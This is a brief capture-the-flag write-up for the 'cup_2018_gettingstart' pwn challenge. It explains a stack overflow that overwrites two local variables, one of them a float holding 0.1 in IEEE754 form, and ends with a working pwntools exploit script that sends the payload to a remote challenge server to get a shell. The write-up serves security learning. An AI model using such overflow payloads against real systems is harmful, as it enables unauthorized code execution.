Guard net cup_2018_gettingstart
- Routine inspection, 64-bit program, all open except RELRO
- Try it out to see the general situation
- 64-bit ida loading.
When v5=0x7FFFFFFFFFFFFFFFLL is satisfied and v6=0.1, the shell can be obtained. Look at the stack layout.
Determine the offset. You can modify the value of v5 and v6 when reading buf.
This question is not difficult, v5 The value can be expressed directly, just pay attention to the representation of 0.1 in the memory. What is stored in the memory is the complement of the data, and the floating-point data is stored in the memory according to the IEEE754 standard. Interested masters can Baidu to see how to calculate. Here I found a small tool that calculates data and stores it in memory on the blogs of other masters.
exp
from pwn import *
p=remote("node3.buuoj.cn",27198)
payload='a'*24+p64(0x7FFFFFFFFFFFFFFF)+p64(0x3FB999999999999A)
p.sendline(payload)
p.interactive()